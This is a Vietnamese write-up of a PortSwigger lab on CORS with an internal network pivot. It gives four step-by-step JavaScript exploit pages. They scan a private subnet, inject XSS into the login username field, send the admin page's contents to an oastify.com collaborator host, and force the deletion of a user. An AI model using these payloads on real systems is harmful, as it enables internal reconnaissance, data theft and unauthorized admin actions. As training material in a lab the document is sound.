- Phuc RiO·Last edited by Phuc RiO on Dec 30, 2023Linked with GitHubContributed by
CORS vulnerability with internal network pivot attack
1.Tìm IP trong mạng nội bộ
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
for (let i=0;i<256;i++){
fetch('http://192.168.0.'+i+':8080')
.then(response=> response.text())
.then(text => {
try {
fetch(collaboratorURL + '?ip=' + 'http://192.168.0.' + i + '&code=' + encodeURIComponent(text))
} catch (error) {
}
})
}
</script>
</html>
Copy vào Exploit Server -> Store -> Deliver exploit to victim
Tìm được IP là 192.168.0.61 và source code trang login
Image Not Showing
Possible Reasons
Learn More →
<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>CORS vulnerability with internal network pivot attack</title>
</head>
<body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class='academyLabBanner'>
<div class=container>
<div class=logo></div>
<div class=title-container>
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id='exploit-link' class='button' target='_blank' href='http://exploit-0a350035044985a380c6488301bf00dd.exploit-server.net'>Go to exploit server</a>
<a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'>
Back to lab description
<svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
<g>
<polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
<polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
</g>
</svg>
</a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'>
<span>LAB</span>
<p>Not solved</p>
<span class=lab-status-icon></span>
</div>
</div>
</div>
</section>
</div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href="/my-account">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<h1>Login</h1>
<section>
<form class=login-form method=POST action="/login">
<input required type="hidden" name="csrf" value="DJv2phmih2CeooESDPNnQaTAGiT6kJkA">
<label>Username</label>
<input required type=username name="username" autofocus>
<label>Password</label>
<input required type=password name="password">
<button class=button type=submit> Log in </button>
</form>
</section>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
</body>
</html>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class="academyLabBanner">
<div class="container">
<div class="logo"></div>
<div class="title-container">
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id="exploit-link" class="button" target="_blank" href="http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net">Go to exploit server</a>
<a class="link-back" href="https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack">
Back to lab description
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 28 30" enable-background="new 0 0 28 30" xml:space="preserve" title="back-arrow">
<g>
<polygon points="1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15"></polygon>
<polygon points="14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15"></polygon>
</g>
</svg>
</a>
</div>
<div class="widgetcontainer-lab-status is-notsolved">
<span>LAB</span>
<p>Not solved</p>
<span class="lab-status-icon"></span>
</div>
</div>
</section></div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href="/">Home</a><p>|</p>
<a href="/admin">Admin panel</a><p>|</p>
<a href="/my-account?id=administrator">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<form style="margin-top: 1em" class="login-form" action="/admin/delete" method="POST">
<input required="" type="hidden" name="csrf" value="ueASHsgFO6MbB8TLaTjSw38sZe3Opiex">
<label>Username</label>
<input required="" type="text" name="username">
<button class="button" type="submit">Delete user</button>
</form>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>CORS vulnerability with internal network pivot attack</title>
</head>
<body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class='academyLabBanner'>
<div class=container>
<div class=logo></div>
<div class=title-container>
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id='exploit-link' class='button' target='_blank' href='http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net'>Go to exploit server</a>
<a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'>
Back to lab description
<svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
<g>
<polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
<polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
</g>
</svg>
</a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'>
<span>LAB</span>
<p>Not solved</p>
<span class=lab-status-icon></span>
</div>
</div>
</div>
</section>
</div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href="/my-account">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<h1>Login</h1>
<section>
<form class=login-form method=POST action="/login">
<input required type="hidden" name="csrf" value="2xFL2jEGadxJODxw5C8v7ym927N4SZfj">
<label>Username</label>
<input required type=username name="username" autofocus>
<label>Password</label>
<input required type=password name="password">
<button class=button type=submit> Log in </button>
</form>
</section>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
</body>
</html>
Lấy regex csrf
2.Kiểm tra trường username có dính lỗi XSS hay không
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'
fetch(url)
.then(response => response.text())
.then(text =>{
try {
xss = '"><img src='+collaboratorURL+'?foundXSS=1>';
login_path = '/login?username=' +encodeURIComponent(xss)+'&password=random&csrf='+text.match(/csrf" value="([^"]+)"/);
location = url + login_path;
} catch (error) {
}
})
</script>
</html>
Copy vào Exploit Server -> Store -> Deliver exploit to victim
-> Có lỗi XSS ở trường username
3. Dùng XSS để lấy source trang admin
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'
fetch(url)
.then(response => response.text())
.then(text =>{
try {
xss = '"><iframe src=/admin onload="new Image().src=\''+collaboratorURL+'?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">';
login_path = '/login?username=' +encodeURIComponent(xss)+'&password=random&csrf='+text.match(/csrf" value="([^"]+)"/);
location = url + login_path;
} catch (error) {
}
})
</script>
</html>
Copy vào Exploit Server -> Store -> Deliver exploit to victim
Lấy được src trang admin
<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>CORS vulnerability with internal network pivot attack</title>
</head>
<body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class='academyLabBanner'>
<div class=container>
<div class=logo></div>
<div class=title-container>
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id='exploit-link' class='button' target='_blank' href='http://exploit-0a350035044985a380c6488301bf00dd.exploit-server.net'>Go to exploit server</a>
<a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'>
Back to lab description
<svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
<g>
<polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
<polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
</g>
</svg>
</a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'>
<span>LAB</span>
<p>Not solved</p>
<span class=lab-status-icon></span>
</div>
</div>
</div>
</section>
</div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href="/my-account">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<h1>Login</h1>
<section>
<form class=login-form method=POST action="/login">
<input required type="hidden" name="csrf" value="DJv2phmih2CeooESDPNnQaTAGiT6kJkA">
<label>Username</label>
<input required type=username name="username" autofocus>
<label>Password</label>
<input required type=password name="password">
<button class=button type=submit> Log in </button>
</form>
</section>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
</body>
</html>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class="academyLabBanner">
<div class="container">
<div class="logo"></div>
<div class="title-container">
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id="exploit-link" class="button" target="_blank" href="http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net">Go to exploit server</a>
<a class="link-back" href="https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack">
Back to lab description
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 28 30" enable-background="new 0 0 28 30" xml:space="preserve" title="back-arrow">
<g>
<polygon points="1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15"></polygon>
<polygon points="14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15"></polygon>
</g>
</svg>
</a>
</div>
<div class="widgetcontainer-lab-status is-notsolved">
<span>LAB</span>
<p>Not solved</p>
<span class="lab-status-icon"></span>
</div>
</div>
</section></div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href="/">Home</a><p>|</p>
<a href="/admin">Admin panel</a><p>|</p>
<a href="/my-account?id=administrator">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<form style="margin-top: 1em" class="login-form" action="/admin/delete" method="POST">
<input required="" type="hidden" name="csrf" value="ueASHsgFO6MbB8TLaTjSw38sZe3Opiex">
<label>Username</label>
<input required="" type="text" name="username">
<button class="button" type="submit">Delete user</button>
</form>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
4. Dùng XSS xóa user carlos
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'
fetch(url)
.then(response => response.text())
.then(text =>{
try {
xss = '"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">'
login_path = '/login?username=' +encodeURIComponent(xss)+'&password=random&csrf='+text.match(/csrf" value="([^"]+)"/);
location = url + login_path;
} catch (error) {
}
})
</script>
</html>
Copy vào Exploit Server -> Store -> Deliver exploit to victim -> Solved .
Read more
DoxPit HackTheBox
image
Jul 10, 2024Lỗ hổng leo thang đặc quyền Linux CVE-2024-1086
Mô tả: Trong Linux kernel, có một lỗ hổng gọi là "use-after-free" trong thành phần netfilter: nf_tables có thể bị tấn công để leo thang đặc quyền cục bộ. Hàm nft_verdict_init() cho phép các giá trị dương được coi là lỗi loại bỏ (drop error) trong verdict hook, do đó hàm nf_hook_slow() lấy kết quả từ hàm nft_verdict_init() có thể gây ra một lỗ hổng double free. Attacker sẽ dùng một network request đặc biệt. Request không đúng định dạng này đánh lừa kernel giải phóng nhầm một đoạn bộ nhớ quan trọng khi cho rằng request đó được xử lý bình thường. Sau đó attacker có thể khai thác lỗi bộ nhớ này để chèn và thực thi các lệnh đặc quyền.CVSS: 7.8Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HPhiên bản ảnh hưởng:
Apr 6, 2024HackTheBox - ProxyAsAService
HackTheBox - ProxyAsAService writeup
Jan 5, 2024HackTheBox - RenderQuest
Writeup HackTheBox - RenderQuest
Jan 4, 2024Published on 
HackMD
HackMD